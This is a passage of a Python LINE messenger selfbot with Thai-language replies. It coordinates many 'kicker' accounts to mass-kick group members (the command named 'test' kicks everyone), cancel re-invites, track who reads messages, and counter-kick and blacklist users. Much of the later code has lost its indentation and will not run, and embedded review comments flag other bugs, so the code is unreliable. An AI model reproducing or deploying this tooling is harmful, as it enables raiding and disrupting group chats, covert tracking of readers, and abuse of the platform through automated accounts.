elif cmd.startswith('changegroupname '):
    # Rename the current group; names longer than 50 characters are rejected.
    if msg.toType != 2: return line.sendMessage(to, 'ไม่สามารถเปลี่ยนชื่อกลุ่มได้\nคำสั่งนี้ใช้ได้ในกลุ่มเท่านั้น')
    group = line.getGroup(to)
    gname = removeCmd(text, setKey)
    if len(gname) > 50:
        return line.sendMessage(to, 'ไม่สามารถเปลี่ยนชื่อกลุ่มได้\nชื่อกลุ่มต้องไม่เกิน 50')
    group.name = gname
    line.updateGroup(group)
    line.sendMessage(to, 'เปลี่ยนชื่อกลุ่มเป็น `%s`' % gname)
elif cmd == 'changegrouppict':
    # Arm picture-change mode: the next image sent in this chat becomes the
    # group picture (consumed elsewhere via settings['changeGroupPicture']).
    if msg.toType != 2: return line.sendMessage(to, 'ไม่สามารถเปลี่ยนรุปกลุ่มได้\nคำสั่งนี้ใช้ได้ในกลุ่มเท่านั้น')
    if to not in settings['changeGroupPicture']:
        settings['changeGroupPicture'].append(to)
        line.sendMessage(to, 'กรุณาส่งภาพ, พิม `{key}Abort` ถ้าต้องการยกเลิก\nคำเตือน:การดาวน์โหลดภาพจะล้มเหลวหากอัพโหลดภาพนานเกินไป'.format(key=setKey.title()))
    else:
        line.sendMessage(to, 'คำสั่งนี้ถูกงานอยู่แล้ว, กรุณาส่งภาพ หรือ พิม `{key}Abort` ถ้าต้องการยกเลิก\nคำเตือน:การดาวน์โหลดภาพจะล้มเหลวหากอัพโหลดภาพนานเกินไป'.format(key=setKey.title()))
elif cmd == 'ทดสอบ':
    # Kick every member (except this account) out of the group, pausing 0.8 s
    # between kicks to avoid rate limits; abort on the first TalkException.
    if msg.toType != 2: return line.sendMessage(to, 'ไม่สามารถเตะสมาชิกทั้งหมดได้\nคำสั่งนี้ใช้ได้ในกลุ่มเท่านั้น')
    group = line.getGroup(to)
    if not group.members:
        return line.sendMessage(to, 'ไม่สามารถเตะสมาชิกทั้งหมดได้\nไม่มีคนไห้เตะ')
    for member in group.members:
        if member.mid == myMid:
            continue
        try:
            line.kickoutFromGroup(to, [member.mid])
        except TalkException as talk_error:
            return line.sendMessage(to, 'ไม่สามารถเตะสมาชิกทั้งหมดได้เนื่องจาก `%s`' % talk_error.reason)
        time.sleep(0.8)
    # NOTE(review): the reported count is len(group.members), which still
    # includes this account (skipped above) — off by one when myMid is listed.
    line.sendMessage(to, 'เตะสมาชิกทั้งหมด, จำนวน %i คน' % len(group.members))
elif cmd == 'ยกเชิญ':
    # Cancel every pending group invitation, pausing 0.8 s between calls.
    if msg.toType != 2: return line.sendMessage(to, 'ไม่สามารถยกเลิกค้างเชิญได้\nคำสั่งนี้ใช้ได้ในกลุ่มเท่านั้น')
    group = line.getGroup(to)
    if not group.invitee:
        return line.sendMessage(to, 'ไม่สามารถยกเลิกค้างเชิญได้\nไม่มีสมาชิกค้างเชิญ')
    for member in group.invitee:
        if member.mid == myMid:
            continue
        try:
            line.cancelGroupInvitation(to, [member.mid])
        except TalkException as talk_error:
            return line.sendMessage(to, 'ไม่สามารถยกเลิกค้างเชิญได้เนื่องจาก `%s`' % talk_error.reason)
        time.sleep(0.8)
    line.sendMessage(to, 'ยกเลิกค้างเชิญทั้งหมดแล้ว\nจำนวน %i คน' % len(group.invitee))
elif cmd.startswith('นับ'):
    # Reader-lurk tracker ("นับ"): records who reads messages in this chat.
    # Sub-commands: เปิด/ปิด (on/off), เริ่มใหม่ (list recorded readers),
    # รีบู (reset), ReplyReader on/off/<message>.  Bare "นับ" shows the menu.
    textt = removeCmd(text, setKey)
    texttl = textt.lower()
    if msg.toType in [1, 2] and to not in lurking:
        # First use in this chat: seed the per-chat tracking record.
        lurking[to] = {
            'status': False,
            'time': None,
            'members': [],
            'reply': {
                'status': False,
                'message': settings['defaultReplyReader']
            }
        }
    # Build the status/usage menu.
    res = '╭───🍁 ตั้งจับ คนแอดอ่าน 🍁'
    if msg.toType in [1, 2]: res += '\n├🙄 Status : ' + bool_dict[lurking[to]['status']][1]
    if msg.toType in [1, 2]: res += '\n├🙄 Reply Reader : ' + bool_dict[lurking[to]['reply']['status']][1]
    if msg.toType in [1, 2]: res += '\n├🙄 ข้อความ ทักทาย : ' + lurking[to]['reply']['message']
    res += '\n├👊 Usage : '
    res += '\n│🙄 {key}นับ'
    res += '\n│🙄 {key}นับ ❪เปิด⁐ปิด❫ '
    res += '\n│🙄 {key}นับ รีบู'
    res += '\n│🙄 {key}นับ เริ่มใหม่'
    res += '\n│🙄 {key}นับ ReplyReader <on/off>'
    res += '\n│🙄 {key}นับ ReplyReader <message>'
    res += '\n╰───👊【☠⁐Tҽαɱ ƑմçҟᎠҽѵìӀ✍⁐☠】👊'
    if cmd == 'นับ':
        line.sendMessage(to, parsingRes(res).format_map(SafeDict(key=setKey.title())))
    elif msg.toType not in [1, 2]:
        return line.sendMessage(to, 'ไม่สามารถใช้คำสั่งนี้ได้\nคำสั่งนี้ใช้ได้ในกลุ่มเท่านั้น')
    elif texttl == 'เปิด':
        if lurking[to]['status']:
            # Already enabled.
            line.sendMessage(to, 'เปิดโหมดตรวจจับคนอ่าน')
        else:
            lurking[to].update({
                'status': True,
                'time': datetime.now(tz=pytz.timezone('Asia/Jakarta')).strftime('%Y-%m-%d %H:%M:%S'),
                'members': []
            })
            # NOTE(review): this branch just ENABLED tracking but the reply
            # text says "ปิด" (disabled) — probable copy-paste in the string.
            line.sendMessage(to, '😜ได้ทำการปิดจับคนแอดอ่านแล้ว😜')
    elif texttl == 'ปิด':
        if not lurking[to]['status']:
            # Already disabled.
            line.sendMessage(to, 'ปิดโหมดตรวจจับคนอ่าน')
        else:
            lurking[to].update({
                'status': False,
                'time': None,
                'members': []
            })
            line.sendMessage(to, '😜ได้ทำการปิดดูคนแอดอ่านแล้ว😜')
    elif texttl == 'เริ่มใหม่':
        # Despite the name, this sub-command LISTS the recorded readers,
        # sending at most 200 names per message.
        if not lurking[to]['status']:
            line.sendMessage(to, 'รีเช็ตคนอ่านเรียบร้อย')
        else:
            if not lurking[to]['members']:
                line.sendMessage(to, 'ไม่สามารถรีเช็ตคนอ่านได้\nเนื่องจากไม่พบคนอ่าน')
            else:
                members = lurking[to]['members']
                res = '╭───🍁 ตั้งจับ คนแอดอ่าน 🍁'
                if msg.toType == 2: res += '\n├😊 Group Name : ' + line.getGroup(to).name
                parsed_len = len(members)//200+1   # number of 200-name chunks
                no = 0
                for point in range(parsed_len):
                    for member in members[point*200:(point+1)*200]:
                        no += 1
                        try:
                            name = line.getContact(member).displayName
                        except TalkException:
                            name = 'Unknown'
                        res += '\n│ %i. %s' % (no, name)
                        if member == members[-1]:
                            # Last reader overall: append the footer.
                            res += '\n│'
                            res += '\n├ Time Set : ' + lurking[to]['time']
                            res += '\n╰───👊【☠⁐Tҽαɱ ƑմçҟᎠҽѵìӀ✍⁐☠】👊'
                    if res:
                        if res.startswith('\n'): res = res[1:]
                        line.sendMessage(to, res)
                        res = ''
    elif texttl == 'รีบู':
        # Reset: clear recorded readers and restamp the tracking start time.
        if not lurking[to]['status']:
            line.sendMessage(to, 'ไม่สามารถรีเช็ตคนอ่านได้\nยังไม่ได้เปิดโหมดตรวจจับคนอ่าน')
        else:
            lurking[to].update({
                'status': True,
                'time': datetime.now(tz=pytz.timezone('Asia/Jakarta')).strftime('%Y-%m-%d %H:%M:%S'),
                'members': []
            })
            line.sendMessage(to, 'รีเช็ตเรียบร้อย')
    elif texttl.startswith('replyreader '):
        texts = textt[12:]   # payload after the 12-char 'replyreader ' prefix
        if texts == 'on':
            if lurking[to]['reply']['status']:
                line.sendMessage(to, 'ข้อความทักคนอ่านเปิดใช้งานอยู่แล้ว')
            else:
                lurking[to]['reply']['status'] = True
                line.sendMessage(to, 'เปิดข้อความทักคนอ่าน')
        elif texts == 'off':
            if not lurking[to]['reply']['status']:
                line.sendMessage(to, 'ข้อความทักคนอ่านถุกปิดใช้งานอยู่แล้ว')
            else:
                lurking[to]['reply']['status'] = False
                line.sendMessage(to, 'ปิดข้อความทักคนอ่าน')
        else:
            # Any other payload becomes the new reply-reader message.
            lurking[to]['reply']['message'] = texts
            line.sendMessage(to, 'เปลี่ยนข้อความทักคนอ่านเป็น `%s`' % texts)
    else:
        # Unrecognised sub-command: re-show the menu.
        line.sendMessage(to, parsingRes(res).format_map(SafeDict(key=setKey.title())))
elif cmd.startswith('ทักทาย'):
textt = removeCmd(text, setKey)
texttl = textt.lower()
res = '╭───🍁 ข้อความ ทักทายเข้ากลุ่ม 🍁'
res += '\n├👊ทักทาย เข้า : ' + bool_dict[settings['greet']['join']['status']][1]
res += '\n├👊ข้อความ : ' + settings['greet']['join']['message']
res += '\n├👊ทักทาย ออก : ' + bool_dict[settings['greet']['leave']['status']][0]
res += '\n├👊ข้อความ : ' + settings['greet']['leave']['message']
res += '\n├🌷Usage : '
res += '\n│🙄{key}ทักทาย'
res += '\n│🙄{key}ทักทาย เข้า ❨เปิด⁐ปิด❩'
res += '\n│🙄{key}ทักทาย เข้า ❨พิมพ์❩'
res += '\n│🙄{key}ทักทาย ออก ❨เปิด⁐ปิด❩'
res += '\n│🙄{key}ทักทาย ออก ❨พิมพ์❩'
res += '\n╰───👊【☠⁐Tҽαɱ ƑմçҟᎠҽѵìӀ✍⁐☠】👊'
if cmd == 'ทักทาย':
line.sendMessage(to, parsingRes(res).format_map(SafeDict(key=setKey.title())))
elif texttl.startswith('เข้า '):
texts = textt[5:]
textsl = texts.lower()
if textsl == 'เปิด':
if settings['greet']['join']['status']:
line.sendMessage(to, 'ข้อความทักคนเข้ากลุ่มถูกเปิดใช้งานอยู่แล้ว')
else:
settings['greet']['join']['status'] = True
line.sendMessage(to, 'เปิดข้อความทักคนเข้ากลุ่ม')
elif textsl == 'ปิด':
if not settings['greet']['join']['status']:
line.sendMessage(to, 'ข้อความทักคนเข้ากลุ่มถูกปิดใช้งานอยู่แล้ว')
else:
settings['greet']['join']['status'] = False
line.sendMessage(to, 'ปิดข้อความทักคนเข้ากลุ่ม')
else:
settings['greet']['join']['message'] = texts
line.sendMessage(to, 'เปลี่ยนข้อความทักคนเข้ากลุ่มเป็น `%s`' % texts)
elif texttl.startswith('ออก '):
texts = textt[6:]
textsl = texts.lower()
if textsl == 'เปิด':
if settings['greet']['leave']['status']:
line.sendMessage(to, 'ข้อความทักคนออกกลุ่มถุกเปิดใช้งานอยู่แล้ว')
else:
settings['greet']['leave']['status'] = True
line.sendMessage(to, 'เปิดข้อความทักคนออกกลุ่ม')
elif textsl == 'ปิด':
if not settings['greet']['leave']['status']:
line.sendMessage(to, 'ข้อความทักคนออกกลุ่มถูกปิดใช้งานอยู่แล้ว')
else:
settings['greet']['leave']['status'] = False
line.sendMessage(to, 'ปิดข้อความทักคนออกกลุ่ม')
else:
settings['greet']['leave']['message'] = texts
line.sendMessage(to, 'เปลี่ยนข้อความทักคนออกกลุ่มเป็น `%s`' % texts)
else:
line.sendMessage(to, parsingRes(res).format_map(SafeDict(key=setKey.title())))
elif cmd.startswith('เตะ '):
    # Kick the mentioned member(s), 0.8 s apart, using the kicker5 account.
    if msg.toType != 2: return line.sendMessage(to, 'คำสั่งนี้ใช้ได้เฉพาะในกลุ่มเท่านั้น')
    if 'MENTION' in msg.contentMetadata.keys():
        # contentMetadata['MENTION'] is a Python-literal string; parse safely.
        mentions = ast.literal_eval(msg.contentMetadata['MENTION'])
        for mention in mentions['MENTIONEES']:
            mid = mention['M']
            if mid == myMid:
                continue
            try:
                kicker5.kickoutFromGroup(to, [mid])
            except TalkException as talk_error:
                return kicker5.sendMessage(to, 'ไม่สามารถเตะสมาชิกได้\nเนื่องจาก `%s`' % talk_error.reason)
            time.sleep(0.8)
        kicker5.sendMessage(to, 'เตะสมาชิกเรียบร้อย\nจำนวน %i คน' % len(mentions['MENTIONEES']))
    else:
        kicker5.sendMessage(to, 'ไม่สามารถเตะสมาชิกได้\nกรุณาแท็กคนที่จะเตะ')
elif cmd.startswith('ปลิว '):
    # "Blow away" the mentioned member(s): kick, re-add as contact, re-invite
    # and immediately cancel the invite — leaving the victim out of the group
    # with no usable invitation.  0.8 s pause between victims.
    if msg.toType != 2: return line.sendMessage(to, 'คำสั่งนี้ใช้ได้เฉพาะในกลุ่มเท่านั้น')
    if 'MENTION' in msg.contentMetadata.keys():
        mentions = ast.literal_eval(msg.contentMetadata['MENTION'])
        for mention in mentions['MENTIONEES']:
            mid = mention['M']
            if mid == myMid:
                continue
            try:
                line.kickoutFromGroup(to, [mid])
                line.findAndAddContactsByMid(mid)
                line.inviteIntoGroup(to, [mid])
                line.cancelGroupInvitation(to, [mid])
            except TalkException as talk_error:
                return line.sendMessage(to, 'ไม่สามารถเตะสมาชิกได้\nเนื่องจาก `%s`' % talk_error.reason)
            time.sleep(0.8)
        line.sendMessage(to, 'เตะสมาชิกเรียบร้อย\nจำนวน %i คน' % len(mentions['MENTIONEES']))
    else:
        line.sendMessage(to, 'ไม่สามารถเตะสมาชิกได้\nกรุณาแท็กคนที่จะเตะ')
# Running count of groups auto-joined-and-left by the op.type 13 handler below.
ronum = 0
def executeOp(op):
    """Handle one fetched LINE operation (invites, joins, kicks, etc.).

    Dispatches on ``op.type`` and drives the protection / auto-reply logic
    using the main ``line`` account plus the kicker helper accounts.
    """
    global ronum
    try:
        if op.type == 0:
            # No-op heartbeat operation.
            return
        if op.type == 13:
            # Invited into a group: auto-accept small groups (<= 10 members),
            # leave again almost immediately and bump the counter.
            group = line.getGroup(op.param1)
            group.members = [] if not group.members else group.members
            if len(group.members) <= 10:
                line.acceptGroupInvitation(group.id)
                time.sleep(0.02)
                line.leaveGroup(group.id)
                ronum = (ronum + 1)
                print(ronum)
        # Console trace of every operation type seen.
        print ('[* %i ] %s' % (op.type, OpType._VALUES_TO_NAMES[op.type].replace('_', ' ')))
        if op.type == 5:
            # Someone added us as a friend: optionally add back and send the
            # auto-add greeting (mention form when the template contains '@!').
            if settings['autoAdd']['status']:
                line.findAndAddContactsByMid(op.param1)
                if settings['autoAdd']['reply']:
                    if '@!' not in settings['autoAdd']['message']:
                        line.sendMessage(op.param1, settings['autoAdd']['message'])
                    else:
                        line.sendMentionV2(op.param1, settings['autoAdd']['message'], [op.param1])
        if op.type == 15:
            # Member left a group: send the leave greeting; {name} expands to
            # the group name.
            if settings['greet']['leave']['status']:
                if '@!' not in settings['greet']['leave']['message']:
                    line.sendMessage(op.param1, settings['greet']['leave']['message'].format(name=line.getGroup(op.param1).name))
                else:
                    line.sendMentionV2(op.param1, settings['greet']['leave']['message'].format(name=line.getGroup(op.param1).name), [op.param2])
        if op.type == 17:
            # Member joined a group: send the join greeting.
            if settings['greet']['join']['status']:
                if '@!' not in settings['greet']['join']['message']:
                    line.sendMessage(op.param1, settings['greet']['join']['message'].format(name=line.getGroup(op.param1).name))
                else:
                    line.sendMentionV2(op.param1, settings['greet']['join']['message'].format(name=line.getGroup(op.param1).name), [op.param2])
        if op.type == 11:
            # QR/link protection: if a non-privileged member re-opened
            # join-by-ticket on a protected group, reissue the ticket, close
            # it again and kick the offender via a random helper account.
            if op.param1 in protectqr:
                try:
                    if line.getGroup(op.param1).preventedJoinByTicket == False:
                        if op.param2 not in Bots and op.param2 not in owner and op.param2 not in admin and op.param2 not in staff:
                            random.choice(ABC).reissueGroupTicket(op.param1)
                            X = line.getGroup(op.param1)
                            X.preventedJoinByTicket = True
                            random.choice(ABC).updateGroup(X)
                            random.choice(ABC).kickoutFromGroup(op.param1,[op.param2])
                except:
                    pass
        if op.type == 13:
            # Invite protection: a non-privileged member invited someone into
            # a protected group.  Blacklist the inviter, cancel the pending
            # invite and kick the inviter, falling back through the helper
            # accounts (kicker .. kicker10) until one succeeds.
            if op.param1 in protectinvite:
                if op.param2 not in Bots and op.param2 not in owner and op.param2 not in admin and op.param2 not in staff:
                    try:
                        invitor = op.param2   # NOTE(review): assigned but never used
                        gotinvite = []
                        # param3 may carry several invitees separated by \x1e.
                        if "\x1e" in op.param3:
                            gotinvite = op.param3.split("\x1e")
                        else:
                            gotinvite.append(op.param3)
                        # NOTE(review): the loop variable `u` is never used —
                        # cancellation always targets op.param3 verbatim, so
                        # multi-invitee batches are not cancelled one by one.
                        for u in gotinvite:
                            wait["blacklist"][op.param2] = True
                            kicker.cancelGroupInvitation(op.param1,[op.param3])
                            kicker.kickoutFromGroup(op.param1,[op.param2])
                    except:
                        # Fallback chain: each nested handler retries with the
                        # next helper account; the innermost gives up silently.
                        try:
                            kicker2.cancelGroupInvitation(op.param1,[op.param3])
                            kicker2.kickoutFromGroup(op.param1,[op.param2])
                        except:
                            try:
                                kicker3.cancelGroupInvitation(op.param1,[op.param3])
                                kicker3.kickoutFromGroup(op.param1,[op.param2])
                            except:
                                try:
                                    kicker4.cancelGroupInvitation(op.param1,[op.param3])
                                    kicker4.kickoutFromGroup(op.param1,[op.param2])
                                except:
                                    try:
                                        kicker5.cancelGroupInvitation(op.param1,[op.param3])
                                        kicker5.kickoutFromGroup(op.param1,[op.param2])
                                    except:
                                        try:
                                            kicker6.cancelGroupInvitation(op.param1,[op.param3])
                                            kicker6.kickoutFromGroup(op.param1,[op.param2])
                                        except:
                                            try:
                                                kicker7.cancelGroupInvitation(op.param1,[op.param3])
                                                kicker7.kickoutFromGroup(op.param1,[op.param2])
                                            except:
                                                try:
                                                    kicker8.cancelGroupInvitation(op.param1,[op.param3])
                                                    kicker8.kickoutFromGroup(op.param1,[op.param2])
                                                except:
                                                    try:
                                                        kicker9.cancelGroupInvitation(op.param1,[op.param3])
                                                        kicker9.kickoutFromGroup(op.param1,[op.param2])
                                                    except:
                                                        try:
                                                            kicker10.cancelGroupInvitation(op.param1,[op.param3])
                                                            kicker10.kickoutFromGroup(op.param1,[op.param2])
                                                        except:
                                                            pass
        if op.type == 13:
            # A blacklisted user was invited: cancel the invite, kick the
            # inviter and close the group's ticket link.
            if op.param3 in wait["blacklist"]:
                if op.param2 not in Bots and op.param2 not in owner and op.param2 not in admin and op.param2 not in staff:
                    random.choice(ABC).cancelGroupInvitation(op.param1,[op.param3])
                    random.choice(ABC).kickoutFromGroup(op.param1,[op.param2])
                    G = line.getGroup(op.param1)
                    G.preventedJoinByTicket = True
                    random.choice(ABC).updateGroup(G)
        if op.type == 32:
            # Cancel-protection (js variant): someone cancelled a bot's invite
            # in a protected group -> blacklist and counter-kick.
            if op.param1 in protectcanceljs:
                if op.param3 in Bots:
                    if op.param2 not in Bots and op.param2 not in owner and op.param2 not in admin and op.param2 not in staff:
                        wait["blacklist"][op.param2] = True
                        try:
                            if op.param3 not in wait["blacklist"]:
                                random.choice(ABC).kickoutFromGroup(op.param1,[op.param2])
                                line.inviteIntoGroup(op.param1,[g1MID])
                                # NOTE(review): `G` is not defined in this scope,
                                # so these two lines raise NameError and are
                                # swallowed by the bare except below — the
                                # ticket link is never actually closed here.
                                G.preventedJoinByTicket = True
                                random.choice(ABC).updateGroup(G)
                        except:
                            pass
                        return
        if op.type == 32:
            # Cancel-protection: kick the canceller, re-add and re-invite the
            # cancelled victim, and blacklist the canceller.
            # NOTE(review): the privilege check below is a no-op (`pass` with
            # no else), so even bots/owner/admin/staff trigger the punishment —
            # the protectcancel block was likely meant to sit under an else.
            if op.param2 not in Bots and op.param2 not in owner and op.param2 not in admin and op.param2 not in staff:
                pass
            if op.param1 in protectcancel:
                random.choice(ABC).kickoutFromGroup(op.param1,[op.param2])
                kicker.findAndAddContactsByMid(op.param3)
                kicker.inviteIntoGroup(op.param1,[op.param3])
                wait["blacklist"][op.param2] = True
        if op.type == 17:
            # A blacklisted user joined: kick and close the ticket link.
            if op.param2 in wait["blacklist"]:
                if op.param2 not in Bots and op.param2 not in owner and op.param2 not in admin and op.param2 not in staff:
                    random.choice(ABC).kickoutFromGroup(op.param1,[op.param2])
                    G = line.getGroup(op.param1)
                    G.preventedJoinByTicket = True
                    random.choice(ABC).updateGroup(G)
        if op.type == 17:
            # ARoin protection: blacklist the joiner and kick unless param3 is
            # itself blacklisted.
            if op.param1 in protecARoin:
                if op.param2 not in Bots and op.param2 not in owner and op.param2 not in admin and op.param2 not in staff:
                    wait["blacklist"][op.param2] = True
                    try:
                        if op.param3 not in wait["blacklist"]:
                            random.choice(ABC).kickoutFromGroup(op.param1,[op.param2])
                    except:
                        pass
                    return
        #================================================================================
        if op.type == 19:
            # Kick protection: blacklist and counter-kick non-privileged kickers.
            if op.param1 in protectkick:
                if op.param2 not in Bots and op.param2 not in owner and op.param2 not in admin and op.param2 not in staff:
                    wait["blacklist"][op.param2] = True
                    random.choice(ABC).kickoutFromGroup(op.param1,[op.param2])
                else:
                    pass
        if op.type == 19:
            # Ghost mode: temporarily open the ticket link, let g1 join by
            # ticket, counter-kick the attacker, then close the link again.
            if op.param1 in ghost:
                if op.param2 not in Bots and op.param2 not in owner and op.param2 not in admin and op.param2 not in staff:
                    G = line.getGroup(op.param1)
                    G.preventedJoinByTicket = False
                    random.choice(ABC).updateGroup(G)
                    invsend = 0
                    Ticket = random.choice(ABC).reissueGroupTicket(op.param1)
                    g1.acceptGroupInvitationByTicket(op.param1,Ticket)
                    g1.kickoutFromGroup(op.param1,[op.param2])
                    X = line.getGroup(op.param1)
                    X.preventedJoinByTicket = True
                    random.choice(ABC).updateGroup(X)
        if op.type == 19:
            # Anti-js: this account was the one kicked -> g1 rejoins,
            # re-invites us, kicks the attacker, blacklists them, then leaves
            # and mass-invites the whole helper-account roster back in.
            if op.param1 in protectantijs:
                if myMid in op.param3:
                    if op.param2 not in Bots and op.param2 not in owner and op.param2 not in admin and op.param2 not in staff:
                        try:
                            g1.acceptGroupInvitation(op.param1)
                            g1.inviteIntoGroup(op.param1,[myMid])
                            g1.kickoutFromGroup(op.param1,[op.param2])
                            line.acceptGroupInvitation(op.param1)
                            wait["blacklist"][op.param2] = True
                            g1.leaveGroup(op.param1)
                            line.inviteIntoGroup(op.param1,[Amid,Bmid,Cmid,Dmid,Emid,Fmid,Gmid,Hmid,Imid,Jmid,ga1,ga2,ga3,ga4,ga5,ga6,ga7,ga8,ga9,ga10,g1MID])
                        except:
                            pass
if op.type == 19:
if myMid in op.param3:
if op.param2 in Bots:
pass
if op.param2 in owner:
pass
if op.param2 in admin:
pass
if op.param2 in staff:
pass
else:
wait["blacklist"][op.param2] = True
try:
kicker.kickoutFromGroup(op.param1,[op.param2])
kicker.inviteIntoGroup(op.param1,[op.param3])
line.acceptGroupInvitation(op.param1)
except:
try:
kicker2.kickoutFromGroup(op.param1,[op.param2])
kicker2.inviteIntoGroup(op.param1,[op.param3])
line.acceptGroupInvitation(op.param1)
except:
try:
kicker3.kickoutFromGroup(op.param1,[op.param2])
kicker3.inviteIntoGroup(op.param1,[op.param3])
line.acceptGroupInvitation(op.param1)
except:
try:
G = kicker4.getGroup(op.param1)
G.preventedJoinByTicket = False
kicker4.kickoutFromGroup(op.param1,[op.param2])
kicker4.updateGroup(G)
Ticket = kicker4.reissueGroupTicket(op.param1)
line.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker2.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker3.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker4.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker5.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker6.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker7.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker8.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker9.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker10.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker11.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker12.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker13.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker14.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker15.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker16.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker17.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker18.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker19.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker20.acceptGroupInvitationByTicket(op.param1,Ticket)
G = kicker4.getGroup(op.param1)
G.preventedJoinByTicket = True
kicker4.updateGroup(G)
Ticket = kicker4.reissueGroupTicket(op.param1)
except:
try:
kicker5.kickoutFromGroup(op.param1,[op.param2])
kicker5.inviteIntoGroup(op.param1,[op.param3])
line.acceptGroupInvitation(op.param1)
except:
try:
kicker6.kickoutFromGroup(op.param1,[op.param2])
kicker6.inviteIntoGroup(op.param1,[op.param3])
line.acceptGroupInvitation(op.param1)
except:
try:
kicker7.kickoutFromGroup(op.param1,[op.param2])
kicker7.inviteIntoGroup(op.param1,[op.param3])
line.acceptGroupInvitation(op.param1)
except:
try:
kicker8.kickoutFromGroup(op.param1,[op.param2])
kicker8.inviteIntoGroup(op.param1,[op.param3])
line.acceptGroupInvitation(op.param1)
except:
try:
kicker9.kickoutFromGroup(op.param1,[op.param2])
kicker9.inviteIntoGroup(op.param1,[op.param3])
line.acceptGroupInvitation(op.param1)
except:
try:
kicker10.kickoutFromGroup(op.param1,[op.param2])
kicker10.inviteIntoGroup(op.param1,[op.param3])
line.acceptGroupInvitation(op.param1)
except:
try:
kicker11.kickoutFromGroup(op.param1,[op.param2])
kicker11.inviteIntoGroup(op.param1,[op.param3])
line.acceptGroupInvitation(op.param1)
except:
try:
kicker12.kickoutFromGroup(op.param1,[op.param2])
kicker12.inviteIntoGroup(op.param1,[op.param3])
line.acceptGroupInvitation(op.param1)
except:
try:
kicker13.kickoutFromGroup(op.param1,[op.param2])
kicker13.inviteIntoGroup(op.param1,[op.param3])
line.acceptGroupInvitation(op.param1)
except:
try:
kicker14.kickoutFromGroup(op.param1,[op.param2])
kicker14.inviteIntoGroup(op.param1,[op.param3])
line.acceptGroupInvitation(op.param1)
except:
try:
kicker15.kickoutFromGroup(op.param1,[op.param2])
kicker15.inviteIntoGroup(op.param1,[op.param3])
line.acceptGroupInvitation(op.param1)
except:
try:
kicker16.kickoutFromGroup(op.param1,[op.param2])
kicker16.inviteIntoGroup(op.param1,[op.param3])
line.acceptGroupInvitation(op.param1)
except:
try:
kicker17.kickoutFromGroup(op.param1,[op.param2])
kicker17.inviteIntoGroup(op.param1,[op.param3])
line.acceptGroupInvitation(op.param1)
except:
try:
kicker18.kickoutFromGroup(op.param1,[op.param2])
kicker18.inviteIntoGroup(op.param1,[op.param3])
line.acceptGroupInvitation(op.param1)
except:
try:
kicker19.kickoutFromGroup(op.param1,[op.param2])
kicker20.kickoutFromGroup(op.param1,[op.param2])
kicker20.inviteIntoGroup(op.param1,[op.param3])
line.acceptGroupInvitation(op.param1)
except:
pass
return
if Amid in op.param3:
if op.param2 in Bots:
pass
if op.param2 in owner:
pass
if op.param2 in admin:
pass
if op.param2 in staff:
pass
else:
wait["blacklist"][op.param2] = True
try:
kicker2.kickoutFromGroup(op.param1,[op.param2])
kicker2.inviteIntoGroup(op.param1,[op.param3])
kicker.acceptGroupInvitation(op.param1)
except:
try:
kicker3.kickoutFromGroup(op.param1,[op.param2])
kicker3.inviteIntoGroup(op.param1,[op.param3])
kicker.acceptGroupInvitation(op.param1)
except:
try:
kicker4.kickoutFromGroup(op.param1,[op.param2])
kicker4.inviteIntoGroup(op.param1,[op.param3])
kicker.acceptGroupInvitation(op.param1)
except:
try:
G = kicker5.getGroup(op.param1)
G.preventedJoinByTicket = False
kicker5.kickoutFromGroup(op.param1,[op.param2])
kicker5.updateGroup(G)
Ticket = kicker5.reissueGroupTicket(op.param1)
line.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker2.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker3.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker4.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker5.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker6.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker7.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker8.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker9.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker10.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker11.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker12.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker13.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker14.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker15.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker16.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker17.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker18.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker19.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker20.acceptGroupInvitationByTicket(op.param1,Ticket)
G = kicker5.getGroup(op.param1)
G.preventedJoinByTicket = True
kicker5.updateGroup(G)
Ticket = kicker5.reissueGroupTicket(op.param1)
except:
try:
kicker6.kickoutFromGroup(op.param1,[op.param2])
kicker6.inviteIntoGroup(op.param1,[op.param3])
kicker.acceptGroupInvitation(op.param1)
except:
try:
kicker7.kickoutFromGroup(op.param1,[op.param2])
kicker7.inviteIntoGroup(op.param1,[op.param3])
kicker.acceptGroupInvitation(op.param1)
except:
try:
kicker8.kickoutFromGroup(op.param1,[op.param2])
kicker8.inviteIntoGroup(op.param1,[op.param3])
kicker.acceptGroupInvitation(op.param1)
except:
try:
kicker9.kickoutFromGroup(op.param1,[op.param2])
kicker9.inviteIntoGroup(op.param1,[op.param3])
kicker.acceptGroupInvitation(op.param1)
except:
try:
